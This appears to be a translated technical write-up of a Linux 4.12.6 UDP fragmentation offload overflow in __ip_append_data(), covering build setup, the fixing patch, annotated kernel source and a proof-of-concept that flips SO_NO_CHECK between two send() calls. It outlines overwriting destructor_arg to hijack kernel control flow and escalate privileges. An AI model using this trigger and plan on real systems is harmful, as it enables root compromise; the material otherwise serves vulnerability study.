Affected versions: Linux <= 4.12.6 (fixed in v4.12.7). CVSS score: 7.0. Found by syzkaller.

Test version: Linux 4.12.6. The exploit and test environment can be downloaded from https://github.com/bsauce/kernel-exploit-factory

Compilation options: CONFIG_SLAB=y, selected via:

General setup -> Choose SLAB allocator (SLUB (Unqueued Allocator)) -> SLAB

When compiling, also set CONFIG_E1000 and CONFIG_E1000E to =y in the config (see reference).

```
$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.12.6.tar.xz
$ tar -xvf linux-4.12.6.tar.xz
$ make menuconfig    # KASAN: enable "Kernel hacking" -> "Memory Debugging" -> "KASAN: runtime memory debugger"
$ make -j32
$ make all
$ make modules
# The compiled bzImage is at arch/x86/boot/bzImage
```

Vulnerability description: the vulnerable function is __ip_append_data(). The kernel uses the SO_NO_CHECK flag (sk->sk_no_check_tx) to decide whether to take the UFO path or the non-UFO path, and this flag can be flipped between two send() calls, switching a pending datagram from the UFO path to the non-UFO path. (On the UFO path the network card fragments the message, so the protocol stack does not have to; on the non-UFO path the message is fragmented in software by the kernel's IP layer.) Because UFO allows a pending packet longer than the MTU, the non-UFO path then writes out of bounds. Specifically, the skb filled on the UFO path is longer than the MTU, so on the non-UFO path copy = maxfraglen - skb->len becomes negative. This triggers allocation of a new skb, and fraggap = skb_prev->len - maxfraglen becomes very large (larger than the MTU). The subsequent skb_copy_and_csum_bits() call copies fraggap bytes into the new skb and overflows it.

- First send(): the UDP message (longer than the MTU) takes the UFO path, and ip_ufo_append_data() copies the user data into the skb's non-linear area (skb_shared_info->frags[]);

- Set sk->sk_no_check_tx to 1 (via setsockopt() with SO_NO_CHECK);

- Second send(): the UDP message takes the non-UFO path. At (9-6) in __ip_append_data(), skb_copy_and_csum_bits() copies data from the old skb_prev (the skb built on the UFO path during the first send, whose data sits in page_frag pages referenced by skb_shared_info->frags[]) into the newly allocated sk_buff, causing the overflow.

Patch: see the diff below. The vulnerability was introduced by the commit "[IPv4/IPv6]: UFO Scatter-gather approach". Patch principle: the bug exists because SO_NO_CHECK can switch a pending datagram between the UFO and non-UFO paths. After the patch, whenever the pending skb is already a GSO skb (Generic Segmentation Offload: segmentation performed just before the data is handed to the network card, of which UFO is one case), the UFO path is taken, so the path can no longer switch midway.

Before the patch, sk_no_check_tx alone decides whether the UFO path is taken. After the patch, even with sk_no_check_tx set, the UFO path is still taken as long as the pending skb is a GSO skb, so the vulnerability can no longer be triggered.

```diff
diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
index 50c74cd890bc7..e153c40c24361 100644
--- a/net/ipv4/ip_output.c
+++ b/net/ipv4/ip_output.c
@@ -965,11 +965,12 @@ static int __ip_append_data(struct sock *sk,
         csummode = CHECKSUM_PARTIAL;
 
     cork->length += length;
-    if ((((length + (skb ? skb->len : fragheaderlen)) > mtu) ||
-         (skb && skb_is_gso(skb))) &&
+    if ((skb && skb_is_gso(skb)) ||
+        (((length + (skb ? skb->len : fragheaderlen)) > mtu) &&
+        (skb_queue_len(queue) <= 1) &&
         (sk->sk_protocol == IPPROTO_UDP) &&
         (rt->dst.dev->features & NETIF_F_UFO) && !dst_xfrm(&rt->dst) &&
-        (sk->sk_type == SOCK_DGRAM) && !sk->sk_no_check_tx) {
+        (sk->sk_type == SOCK_DGRAM) && !sk->sk_no_check_tx)) {
         err = ip_ufo_append_data(sk, queue, getfrag, from, length,
                                  hh_len, fragheaderlen, transhdrlen,
                                  maxfraglen, flags);
```

Previously, no_check alone decided the path; now, once a GSO skb is pending, setting no_check no longer diverts the datagram to the non-UFO path.

```diff
@@ -1288,6 +1289,7 @@ ssize_t ip_append_page(struct sock *sk, struct flowi4 *fl4, struct page *page,
         return -EINVAL;
 
     if ((size + skb->len > mtu) &&
+        (skb_queue_len(&sk->sk_write_queue) == 1) &&
         (sk->sk_protocol == IPPROTO_UDP) &&
         (rt->dst.dev->features & NETIF_F_UFO)) {
         if (skb->ip_summed != CHECKSUM_PARTIAL)
diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
index e6276fa3750b9..a7c804f73990a 100644
--- a/net/ipv4/udp.c
+++ b/net/ipv4/udp.c
@@ -802,7 +802,7 @@ static int udp_send_skb(struct sk_buff *skb, struct flowi4 *fl4)
     if (is_udplite)                 /* UDP-Lite */
         csum = udplite_csum(skb);
 
-    else if (sk->sk_no_check_tx) {   /* UDP csum disabled */
+    else if (sk->sk_no_check_tx && !skb_is_gso(skb)) {   /* UDP csum off */
 
         skb->ip_summed = CHECKSUM_NONE;
         goto send;
```
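To see why the reordered condition closes the hole, the sketch below models the UFO decision in __ip_append_data() before and after the patch as pure boolean functions. Each field of the hypothetical `struct ufo_inputs` stands for one kernel sub-expression (named in its comment); this is a simplified model for illustration, not kernel code.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical booleans standing in for the kernel sub-expressions. */
struct ufo_inputs {
    bool over_mtu;     /* length + (skb ? skb->len : fragheaderlen) > mtu */
    bool pending_gso;  /* skb && skb_is_gso(skb) */
    bool queue_le_1;   /* skb_queue_len(queue) <= 1 (added by the patch) */
    bool udp_dgram;    /* IPPROTO_UDP socket of type SOCK_DGRAM */
    bool dev_ufo;      /* NETIF_F_UFO set and !dst_xfrm(&rt->dst) */
    bool no_check_tx;  /* sk->sk_no_check_tx, set via SO_NO_CHECK */
};

/* Pre-patch: sk_no_check_tx can veto UFO even when a GSO skb is pending. */
static bool takes_ufo_before(struct ufo_inputs in)
{
    return (in.over_mtu || in.pending_gso) && in.udp_dgram && in.dev_ufo &&
           !in.no_check_tx;
}

/* Post-patch: a pending GSO skb always keeps the datagram on the UFO path. */
static bool takes_ufo_after(struct ufo_inputs in)
{
    return in.pending_gso ||
           (in.over_mtu && in.queue_le_1 && in.udp_dgram && in.dev_ufo &&
            !in.no_check_tx);
}
```

For the PoC's second send (GSO skb pending, SO_NO_CHECK set), `takes_ufo_before()` returns false, which is the vulnerable non-UFO path, while `takes_ufo_after()` returns true.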

Protections: SMEP enabled; SMAP and KASLR disabled.

Exploitation summary:

- 1. First send(): take the UFO path so that the pending message is longer than the MTU;

- 2. Set sk->sk_no_check_tx to 1 so that the next send() takes the non-UFO path;

- 3. Second send(): take the non-UFO path and trigger the overflow;

- 4. Overwrite skb_shared_info->destructor_arg so that its ->callback hijacks control flow, then bypass SMEP, escalate privileges, and restore the user-mode registers.

1. Background knowledge

1.1 TCP/IP

Network layering: application-layer message -> transport-layer segment (UDP) -> network-layer datagram (IP) -> link-layer frame

Encapsulation: { link-layer frame { IP packet { UDP datagram { message/data } } } }
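As a small worked example of this nesting, the C sketch below computes how many bytes of application data fit into one IP packet without fragmentation. It assumes a 20-byte IPv4 header with no options and the 8-byte UDP header; `max_udp_payload` is a hypothetical helper name.

```c
#include <assert.h>

/* Header sizes assumed for this sketch: IPv4 without options, plain UDP. */
enum { IPV4_HDR_LEN = 20, UDP_HDR_LEN = 8 };

/* Largest UDP payload that fits in one IP packet without fragmentation.
 * The MTU already excludes the link-layer header. */
static int max_udp_payload(int mtu)
{
    assert(mtu > IPV4_HDR_LEN + UDP_HDR_LEN);
    return mtu - IPV4_HDR_LEN - UDP_HDR_LEN;
}
```

For the usual Ethernet MTU of 1500 bytes, `max_udp_payload(1500)` returns 1472; any larger UDP payload must be fragmented (or handed to UFO).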

1.2 UFO mechanism (UDP Fragmentation Offload)

Message fragmentation: the maximum amount of data a link-layer frame can carry is called the maximum transmission unit (MTU). When an IPv4 packet to be sent is larger than the MTU of the data link layer, it must be split into multiple IP packets (fragments) before sending; IPv4 fragmentation can be carried out in the IP layer or prepared by the transport layer.
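The 8-byte alignment the kernel applies when fragmenting can be sketched as follows. `max_frag_len()` reproduces the `maxfraglen` expression from `__ip_append_data()` (analyzed in 1.4.2); `frag_count()` is a hypothetical helper that assumes every fragment carries the same IP header length.

```c
#include <assert.h>

/* Same expression as in __ip_append_data():
 *   maxfraglen = ((mtu - fragheaderlen) & ~7) + fragheaderlen
 * The IPv4 fragment-offset field counts 8-byte units, so every
 * non-final fragment must carry a multiple of 8 payload bytes. */
static unsigned int max_frag_len(unsigned int mtu, unsigned int fragheaderlen)
{
    return ((mtu - fragheaderlen) & ~7u) + fragheaderlen;
}

/* Fragments needed for ip_payload bytes (UDP header + data). */
static unsigned int frag_count(unsigned int ip_payload, unsigned int mtu,
                               unsigned int fragheaderlen)
{
    unsigned int per_frag = max_frag_len(mtu, fragheaderlen) - fragheaderlen;
    assert(per_frag > 0);
    return (ip_payload + per_frag - 1) / per_frag;   /* round up */
}
```

With mtu = 1500 and a 20-byte header, maxfraglen stays 1500 (1480 is already a multiple of 8), and a 3492-byte UDP datagram needs three fragments (1480 + 1480 + 532). With a 24-byte header, (1500 - 24) & ~7 = 1472, so maxfraglen drops to 1496.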

UFO mechanism: IPv4 messages are fragmented with the assistance of the network card, i.e. fragmentation is done in NIC hardware. User space can send packets longer than the MTU, and the protocol stack does not need to fragment them; as long as UFO is enabled, packets larger than the MTU can be sent. Moving fragmentation from the protocol stack to the NIC improves efficiency and reduces stack overhead. UFO was introduced by the commit "[IPv4/IPv6]: UFO Scatter-gather approach".

1.3 UDP corking mechanism

Cork mechanism: "cork" as in a bottle stopper: data is not sent until the cork is pulled. This avoids continually encapsulating and sending small fragmented packets, which would waste link capacity. With corking enabled, the kernel merges small writes into one larger packet before sending it. For TCP_CORK the wait is capped at 200 ms, after which pending data is sent even if it does not fill an MTU; a corked UDP socket instead keeps accumulating until the cork is released (UDP_CORK cleared, or a send() without MSG_MORE).

Advantages and disadvantages: fewer small packets and better link utilization, at the cost of added latency.
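A toy user-space model of what corking means for UDP is sketched below. The struct and function names are hypothetical, and real kernel state (up->pending, the cork's route and options) is ignored; the `more` flag plays the role of MSG_MORE.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Toy corked socket: writes accumulate into one pending datagram. */
struct toy_cork {
    char pending[65536];
    size_t len;       /* bytes accumulated so far */
    int datagrams;    /* datagrams "sent" so far */
};

/* Returns the size of the datagram emitted by this call, or 0 if still corked. */
static size_t toy_send(struct toy_cork *c, const void *buf, size_t n, bool more)
{
    assert(c->len + n <= sizeof(c->pending));
    memcpy(c->pending + c->len, buf, n);
    c->len += n;
    if (more)
        return 0;             /* corked: wait for more data */
    size_t sent = c->len;     /* uncorked: everything leaves as one datagram */
    c->len = 0;
    c->datagrams++;
    return sent;
}
```

A 2-byte send with `more` set followed by a 3-byte send without it produces a single 5-byte datagram. The PoC relies on the same effect: its first send() uses MSG_MORE, so the second send() appends to the same pending skb.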

Relevant code, udp_sendmsg():

```c
int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
{
    struct inet_sock *inet = inet_sk(sk);
    struct udp_sock *up = udp_sk(sk);
    ... ...
    if (up->pending) {    // Is corking in progress? Checked via up->pending
        /*
         * There are pending frames.
         * The socket lock must be held while it's corked.
         */
        lock_sock(sk);
        if (likely(up->pending)) {
            if (unlikely(up->pending != AF_INET)) {
                release_sock(sk);
                return -EINVAL;
            }
            goto do_append_data;    // Corked: append to the pending datagram
        }
        release_sock(sk);
    }
    ulen += sizeof(struct udphdr);
    ... ...
do_append_data:    // Append the data
    up->len += ulen;
    err = ip_append_data(sk, fl4, getfrag, msg, ulen,    // <---- ip_append_data() appends the data
                         sizeof(struct udphdr), &ipc, &rt,
                         corkreq ? msg->msg_flags|MSG_MORE : msg->msg_flags);
    if (err)
        udp_flush_pending_frames(sk);    // On failure, udp_flush_pending_frames() -> __ip_flush_pending_frames() discards the data
    else if (!corkreq)
        err = udp_push_pending_frames(sk);
    else if (unlikely(skb_queue_empty(&sk->sk_write_queue)))
        up->pending = 0;
    release_sock(sk);
    ... ...
}
EXPORT_SYMBOL(udp_sendmsg);
```



1.4 ip_append_data() fragmentation: source code analysis

Reference: Linux network protocol stack – ip_append_data function analysis

Note: ip_append_data() -> __ip_append_data(); the fragmentation work is actually done by __ip_append_data().

Purpose: arrange the data coming from the upper layer into skbs. A large packet is cut into multiple skbs no larger than the MTU; small packets are merged into one when aggregation (corking) is enabled.



Flow: take the skb at the tail of the socket's send queue; if the queue is empty, allocate a new skb, otherwise reuse the tail skb. Then check whether the per-task page_frag has free space: if so, copy the user data directly into the page_frag; if not, allocate a new page, attach it to the page_frag, and copy the user data into it. Finally, the page in the page_frag is linked into the skb's non-linear area (skb_shared_info->frags[]).
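The page_frag refill-and-link step of this flow can be modeled in user space. This is a hypothetical simplification: `toy_page_frag`, `toy_skb` and `toy_append_frags()` are illustrative names, a 4 KiB page is assumed (giving 17 frags, like MAX_SKB_FRAGS with 4 KiB pages), and unlike the kernel the toy never merges adjacent chunks into one frag.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

#define TOY_PAGE_SIZE 4096
#define TOY_MAX_FRAGS 17   /* mirrors MAX_SKB_FRAGS with 4 KiB pages */

struct toy_page_frag { char *page; size_t offset; };
struct toy_frag { char *addr; size_t len; };
struct toy_skb { struct toy_frag frags[TOY_MAX_FRAGS]; int nr_frags; size_t data_len; };

/* Copy n bytes into the skb's non-linear area, refilling the page_frag
 * with a fresh page whenever the current one is full. */
static int toy_append_frags(struct toy_skb *skb, struct toy_page_frag *pf,
                            const char *src, size_t n)
{
    while (n > 0) {
        if (!pf->page || pf->offset == TOY_PAGE_SIZE) {
            pf->page = malloc(TOY_PAGE_SIZE);   /* never freed in this toy */
            if (!pf->page)
                return -1;
            pf->offset = 0;
        }
        if (skb->nr_frags == TOY_MAX_FRAGS)
            return -1;                          /* frags[] is full */
        size_t chunk = TOY_PAGE_SIZE - pf->offset;
        if (chunk > n)
            chunk = n;
        memcpy(pf->page + pf->offset, src, chunk);
        skb->frags[skb->nr_frags].addr = pf->page + pf->offset;  /* link the page */
        skb->frags[skb->nr_frags].len = chunk;
        skb->nr_frags++;
        skb->data_len += chunk;
        pf->offset += chunk;
        src += chunk;
        n -= chunk;
    }
    return 0;
}
```

Appending 5000 bytes to an empty toy skb fills one whole page and 904 bytes of a second one, giving two frags.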

Vulnerability call chain: udp_sendmsg() -> ip_append_data() -> __ip_append_data() -> ip_ufo_append_data()

1.4.1 ip_append_data(): preparatory work

```c
// getfrag(): callback that copies data into the skb. An skb is a struct sk_buff pointer; struct sk_buff represents a socket buffer.
// transhdrlen: length of the transport-layer header. It also marks the first fragment: non-zero means this is the first fragment.
// flags: this function uses two of them: MSG_PROBE (only probe the path MTU, send no data) and MSG_MORE (more data will follow).
int ip_append_data(struct sock *sk, struct flowi4 *fl4,
                   int getfrag(void *from, char *to, int offset, int len,
                               int odd, struct sk_buff *skb),
                   void *from, int length, int transhdrlen,
                   struct ipcm_cookie *ipc, struct rtable **rtp,
                   unsigned int flags)
{
    struct inet_sock *inet = inet_sk(sk);
    int err;

    if (flags&MSG_PROBE)    // (1) MSG_PROBE set: return 0 immediately
        return 0;

    if (skb_queue_empty(&sk->sk_write_queue)) {    // (2) Send queue empty: initialize the cork with ip_setup_cork()
        err = ip_setup_cork(sk, &inet->cork.base, ipc, rtp);
        if (err)
            return err;
    } else {    // (3) Queue not empty: reuse the previous route, IP options and fragment size; transhdrlen = 0 marks "not the first fragment"
        transhdrlen = 0;
    }

    return __ip_append_data(sk, fl4, &sk->sk_write_queue, &inet->cork.base,    // <--------
                            sk_page_frag(sk), getfrag,
                            from, length, transhdrlen, flags);
}
```

1.4.2 __ip_append_data(): fragmentation flow

```c
static int __ip_append_data(struct sock *sk,
                            struct flowi4 *fl4,
                            struct sk_buff_head *queue,
                            struct inet_cork *cork,
                            struct page_frag *pfrag,
                            int getfrag(void *from, char *to, int offset,
                                        int len, int odd, struct sk_buff *skb),
                            void *from, int length, int transhdrlen,
                            unsigned int flags)
{
    struct inet_sock *inet = inet_sk(sk);
    struct sk_buff *skb;    // (1) The skb being filled; it sits on sk_write_queue, and the IP header is later added in front of its data
    struct ip_options *opt = cork->opt;
    int hh_len;
    int exthdrlen;
    int mtu;
    int copy;
    int err;
    int offset = 0;
    unsigned int maxfraglen, fragheaderlen, maxnonfragsize;
    int csummode = CHECKSUM_NONE;
    struct rtable *rt = (struct rtable *)cork->dst;
    u32 tskey = 0;

    skb = skb_peek_tail(queue);    // (2) Tail skb of the queue (NULL if the queue is empty)

    exthdrlen = !skb ? rt->dst.header_len : 0;
    mtu = cork->fragsize;
    if (cork->tx_flags & SKBTX_ANY_SW_TSTAMP &&
        sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID)
        tskey = sk->sk_tskey++;

    hh_len = LL_RESERVED_SPACE(rt->dst.dev);    // (3) Headroom reserved for the link-layer header; hh_len = 16 here

    fragheaderlen = sizeof(struct iphdr) + (opt ? opt->optlen : 0);    // IP header length
    maxfraglen = ((mtu - fragheaderlen) & ~7) + fragheaderlen;    // Maximum fragment length (IP header + 8-byte-aligned payload); mtu = 1500, fragheaderlen = 20 gives 1500
    // The fragment-offset field counts 8-byte units, so every non-final fragment must carry a multiple of 8 payload bytes; maxfraglen rounds the MTU down accordingly
    maxnonfragsize = ip_sk_ignore_df(sk) ? 0xFFFF : mtu;    // Largest size allowed: 64 KB if DF may be ignored, otherwise the MTU

    if (cork->length + length > maxnonfragsize - fragheaderlen) {
        ip_local_error(sk, EMSGSIZE, fl4->daddr, inet->inet_dport,
                       mtu - (opt ? opt->optlen : 0));
        return -EMSGSIZE;
    }    // If the output is longer than one IP datagram can hold, report EMSGSIZE to the sending socket

    /*
     * transhdrlen > 0 means that this is the first fragment and we wish
     * it won't be fragmented in the future.
     */
    if (transhdrlen &&    // transhdrlen != 0: this call handles the first fragment. If the datagram needs no fragmentation and the device can checksum in hardware, use CHECKSUM_PARTIAL (hardware computes the checksum). First send: transhdrlen = 8, length = 3492
        length + fragheaderlen <= mtu &&
        rt->dst.dev->features & (NETIF_F_HW_CSUM | NETIF_F_IP_CSUM) &&
        !(flags & MSG_MORE) &&
        !exthdrlen)
        csummode = CHECKSUM_PARTIAL;    // (4) Let the hardware compute the checksum

    cork->length += length;    // Update the corked length
    if ((((length + (skb ? skb->len : fragheaderlen)) > mtu) ||
         (skb && skb_is_gso(skb))) &&    // (5) UFO path if the data exceeds the MTU (fragmentation needed) or the pending skb is already GSO, AND the device supports UDP fragmentation offload
        (sk->sk_protocol == IPPROTO_UDP) &&
        (rt->dst.dev->features & NETIF_F_UFO) && !dst_xfrm(&rt->dst) &&
        (sk->sk_type == SOCK_DGRAM) && !sk->sk_no_check_tx) {    // sk_no_check_tx decides whether the UFO path is taken (user space may send messages longer than the MTU; the NIC driver segments them)
        err = ip_ufo_append_data(sk, queue, getfrag, from, length,
                                 hh_len, fragheaderlen, transhdrlen,
                                 maxfraglen, flags);    // (6) UFO path: ip_ufo_append_data() copies the user data into the skb's non-linear area (skb_shared_info->frags[], originally meant for scatter-gather)
        if (err)
            goto error;
        return 0;
    }

    /* So, what's going on in the loop below?
     *
     * We use calculated fragment length to generate chained skb,
     * each of segments is IP fragment ready for sending to network after
     * adding appropriate IP header.
     */

    if (!skb)    // (7) Non-UFO path: an empty queue means there is no skb yet, so jump to alloc_new_skb to allocate one for the data
        goto alloc_new_skb;
```



The copy variable holds the remaining space in the last skb (see (8)); skb->len is the total length of the data held by that skb. There are three cases, each handled by the code below:

- copy < 0: skb->len already exceeds the (8-byte-aligned) MTU. The excess data must be moved from the current IP fragment into a new fragment, so a new skb is allocated for it.

- copy > 0: the last skb still has free space.

- copy = 0: the last skb is full.
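The copy computation at steps (8) and (9) can be replayed on its own. The sketch below copies the two kernel statements into a hypothetical helper, `compute_copy()`, so the three cases can be checked with the values used in this article (mtu = maxfraglen = 1500, skb->len = 3512 after the first send, length = 1 in the second send).

```c
#include <assert.h>

/* Steps (8)-(9) of __ip_append_data():
 *   copy = mtu - skb->len;
 *   if (copy < length) copy = maxfraglen - skb->len;
 * A result <= 0 sends the loop to alloc_new_skb. */
static int compute_copy(int mtu, int maxfraglen, int skb_len, int length)
{
    int copy = mtu - skb_len;
    if (copy < length)
        copy = maxfraglen - skb_len;
    return copy;
}
```

With the PoC's values `compute_copy(1500, 1500, 3512, 1)` is -2012, the copy < 0 case; an skb holding exactly maxfraglen bytes gives 0 (full), and a half-empty skb gives a positive amount of room.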

```c
    while (length > 0) {    // Process the data still to be output
        /* Check if the remaining data fits into current packet. */
        copy = mtu - skb->len;    // (8) copy = free space in the previous skb. Second send: mtu = 1500, skb->len = 3512
        if (copy < length)    // Less room than data left (length = 1 in the second send): use the 8-byte-aligned limit instead
            copy = maxfraglen - skb->len;    // maxfraglen = 1500, so copy = -2012
        if (copy <= 0) {    // (9) The previous skb is full or overfull: allocate a new skb
            char *data;
            unsigned int datalen;
            unsigned int fraglen;
            unsigned int fraggap;
            unsigned int alloclen;
            struct sk_buff *skb_prev;
alloc_new_skb:
            skb_prev = skb;    // If the previous skb holds data beyond the 8-byte-aligned MTU, that excess moves to the new skb
            if (skb_prev)    // (9-1) Compute how much data moves from the previous skb into the new one
                fraggap = skb_prev->len - maxfraglen;    // Effectively -copy: fraggap = 3512 - 1500 = 2012
            else
                fraggap = 0;

            /*
             * If remaining data exceeds the mtu,
             * we know we need more fragment(s).
             */
            datalen = length + fraggap;    // Second send: datalen = 1 + 2012 = 2013
            if (datalen > mtu - fragheaderlen)    // Does not fit in one fragment: cap this fragment's payload by the MTU
                datalen = maxfraglen - fragheaderlen;    // datalen = 1500 - 20 = 1480
            fraglen = datalen + fragheaderlen;    // IP header + payload of this fragment

            if ((flags & MSG_MORE) &&    // (9-2) Compute alloclen, the size of the new skb
                !(rt->dst.dev->features&NETIF_F_SG))
                alloclen = mtu;    // More data follows and the device lacks scatter-gather I/O: allocate a full MTU
            else
                alloclen = fraglen;    // Otherwise size it to the data (including the IP header)

            alloclen += exthdrlen;    // alloclen = 1500 + 0 = 1500

            /* The last fragment gets additional space at tail.
             * Note, with MSG_MORE we overallocate on fragments,
             * because we have no idea what fragment will be
             * the last.
             */
            if (datalen == length + fraggap)
                alloclen += rt->dst.trailer_len;

            if (transhdrlen) {    // (9-3) First fragment: allocate with sock_alloc_send_skb()
                skb = sock_alloc_send_skb(sk,
                        alloclen + hh_len + 15,
                        (flags & MSG_DONTWAIT), &err);
            } else {    // (9-4) Not the first fragment: allocate with sock_wmalloc()
                skb = NULL;
                if (atomic_read(&sk->sk_wmem_alloc) <=
                    2 * sk->sk_sndbuf)
                    skb = sock_wmalloc(sk,
                                       alloclen + hh_len + 15, 1,
                                       sk->sk_allocation);
                if (unlikely(!skb))
                    err = -ENOBUFS;
            }
            if (!skb)    // Allocation failed: jump to error
                goto error;

            /*
             * Fill in the control structures
             */
            skb->ip_summed = csummode;    // (9-5) Allocation succeeded: initialize the checksum fields
            skb->csum = 0;
            skb_reserve(skb, hh_len);    // Reserve headroom for the link-layer header

            /* only the initial fragment is time stamped */
            skb_shinfo(skb)->tx_flags = cork->tx_flags;    // Timestamp flags
            cork->tx_flags = 0;
            skb_shinfo(skb)->tskey = tskey;
            tskey = 0;

            /*
             * Find where to start putting bytes.
             */
            data = skb_put(skb, fraglen + exthdrlen);    // Extend the data area by fraglen + exthdrlen bytes (IP header + payload)
            skb_set_network_header(skb, exthdrlen);    // Set the L3 (network) header pointer
            skb->transport_header = (skb->network_header +
                                     fragheaderlen);
            data += fragheaderlen + exthdrlen;    // Skip the IP header: data advances by 20 + 0 = 20

            if (fraggap) {    // The previous skb holds data beyond the 8-byte-aligned MTU: copy that excess into this skb and fix up both checksums. Here fraggap = 2012
                skb->csum = skb_copy_and_csum_bits(    // (9-6) Copy fraggap bytes of skb_prev, starting at offset maxfraglen, into the newly allocated sk_buff  <----------- !!! overflow point
                    skb_prev, maxfraglen,
                    data + transhdrlen, fraggap, 0);
                skb_prev->csum = csum_sub(skb_prev->csum,
                                          skb->csum);
                data += fraggap;
                pskb_trim_unique(skb_prev, maxfraglen);
            }

            copy = datalen - transhdrlen - fraggap;    // Transport header and carried-over data are done; copy the rest. copy = 1480 - 0 - 2012 = -532
            if (copy > 0 && getfrag(from, data + transhdrlen, offset, copy, fraggap, skb) < 0) {
                err = -EFAULT;
                kfree_skb(skb);
                goto error;
            }

            offset += copy;    // Advance past the data copied in this iteration
            length -= datalen - fraggap;    // Remaining data: length = 1 - (1480 - 2012) = 533
            transhdrlen = 0;    // The transport header and IPsec header have been written, so reset both lengths
            exthdrlen = 0;
            csummode = CHECKSUM_NONE;

            if ((flags & MSG_CONFIRM) && !skb_prev)
                skb_set_dst_pending_confirm(skb, 1);

            /*
             * Put the packet on the pending queue.
             */
            __skb_queue_tail(queue, skb);    // Append the new skb to the tail of the queue, then loop to copy the remaining data
            continue;
        }

        if (copy > length)
            copy = length;    // The last skb has more room than data left: finish in one copy

        if (!(rt->dst.dev->features&NETIF_F_SG)) {
            unsigned int off;    // Device lacks scatter-gather I/O: copy the data into the remaining space of the linear area
            ... ...
```
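The length bookkeeping of one pass through alloc_new_skb can be replayed outside the kernel to see exactly how far the (9-6) copy overruns. In the sketch below, `struct frag_trace` and `trace_alloc_new_skb()` are hypothetical names; the arithmetic follows steps (9-1) to (9-6), and `overflow` is defined here as the number of bytes written past the payload room that `skb_put()` reserved.

```c
#include <assert.h>

struct frag_trace {
    int fraggap;   /* bytes moved out of skb_prev at (9-1) */
    int datalen;   /* payload bytes the new skb is sized for */
    int copy;      /* bytes getfrag() copies afterwards (<= 0: none) */
    int overflow;  /* bytes written past the payload room reserved by skb_put() */
};

static struct frag_trace trace_alloc_new_skb(int length, int prev_len,
                                             int mtu, int maxfraglen,
                                             int fragheaderlen, int transhdrlen)
{
    struct frag_trace t;
    t.fraggap = prev_len - maxfraglen;               /* (9-1) */
    t.datalen = length + t.fraggap;
    if (t.datalen > mtu - fragheaderlen)
        t.datalen = maxfraglen - fragheaderlen;      /* capped to one fragment */
    t.copy = t.datalen - transhdrlen - t.fraggap;
    /* (9-6) writes fraggap bytes at data + transhdrlen, but only
     * datalen - transhdrlen bytes of payload room follow that point. */
    int room = t.datalen - transhdrlen;
    t.overflow = t.fraggap > room ? t.fraggap - room : 0;
    return t;
}
```

With the PoC's second send (length = 1, skb_prev->len = 3512, transhdrlen = 0) this gives fraggap = 2012, datalen = 1480 and an overrun of 532 bytes, the same magnitude as the copy = -532 noted in the comments above. Whether those bytes leave the kmalloc()ed buffer depends on how the allocation size was rounded; for a normally filled previous skb fraggap is 0 and nothing overflows.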

2. Vulnerability principle

2.1 PoC analysis

Notes:

- SOCK_DGRAM selects a datagram socket, i.e. UDP in the IPv4 family.

- AF_INET selects the IPv4 (TCP/IP) protocol family; PF_INET, used in the socket() call, has the same value.

- s_addr holds the IP address. INADDR_LOOPBACK is the loopback address, normally 127.0.0.1, so the PoC only talks to the local host. htons() and htonl() convert values to network byte order.
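The address setup described in these notes can be checked in isolation. The sketch below builds the same destination the PoC connects to (127.0.0.1:8000) without opening a socket; `loopback_addr()` is a hypothetical helper name, and only standard POSIX calls are used.

```c
#include <arpa/inet.h>
#include <assert.h>
#include <netinet/in.h>
#include <string.h>

/* Destination used by the PoC: 127.0.0.1 on the given port. */
static struct sockaddr_in loopback_addr(unsigned short port)
{
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);                    /* host -> network byte order */
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);  /* 0x7f000001 = 127.0.0.1 */
    return addr;
}
```

Converting back with `ntohs()`/`ntohl()` recovers 8000 and 0x7f000001, and `inet_ntop()` renders the address as "127.0.0.1".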

PoC analysis: the PoC calls send() twice. The first send() passes MSG_MORE to tell the kernel that more data will follow; this send takes the UFO path.

```c
// poc
#define SHINFO_OFFSET 3164

void poc(unsigned long payload) {
    char buffer[4096];
    memset(&buffer[0], 0x42, 4096);
    init_skb_buffer(&buffer[SHINFO_OFFSET], payload);    // Helper defined in the full exploit (not shown here)

    int s = socket(PF_INET, SOCK_DGRAM, 0);    // 1. Create a UDP socket (SOCK_DGRAM)
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(8000);
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (connect(s, (void*)&addr, sizeof(addr)))
        exit(EXIT_FAILURE);

    int size = SHINFO_OFFSET + sizeof(struct skb_shared_info);
    int rv = send(s, buffer, size, MSG_MORE);    // 2. Send with MSG_MORE: tells the kernel more data will follow (UFO path)
    int val = 1;
    rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));    // 3. Disable UDP checksums (sets sk->sk_no_check_tx)
    send(s, buffer, 1, 0);    // 4. Second send, 1 byte: takes the non-UFO path and triggers the bug
    close(s);
}
```

As analyzed at step (5) of __ip_append_data(): when a UDP packet is being sent, the device supports UFO, and fragmentation is needed (length > MTU), send() ends up in ip_ufo_append_data().

```c
if ((((length + (skb ? skb->len : fragheaderlen)) > mtu) ||
     (skb && skb_is_gso(skb))) &&    // (5) UFO path if the data exceeds the MTU (fragmentation needed) or the pending skb is already GSO, and UFO support is enabled
    (sk->sk_protocol == IPPROTO_UDP) &&
    (rt->dst.dev->features & NETIF_F_UFO) && !dst_xfrm(&rt->dst) &&
    (sk->sk_type == SOCK_DGRAM) && !sk->sk_no_check_tx) {
    err = ip_ufo_append_data(sk, queue, getfrag, from, length,
                             hh_len, fragheaderlen, transhdrlen,
                             maxfraglen, flags);    // (6) If (5) holds, call ip_ufo_append_data()
    ... ...
}
```



2.2 ip_ufo_append_data() analysis

```c
static inline int ip_ufo_append_data(struct sock *sk,
                                     struct sk_buff_head *queue,
                                     int getfrag(void *from, char *to, int offset, int len,
                                                 int odd, struct sk_buff *skb),
                                     void *from, int length, int hh_len, int fragheaderlen,
                                     int transhdrlen, int maxfraglen, unsigned int flags)
{
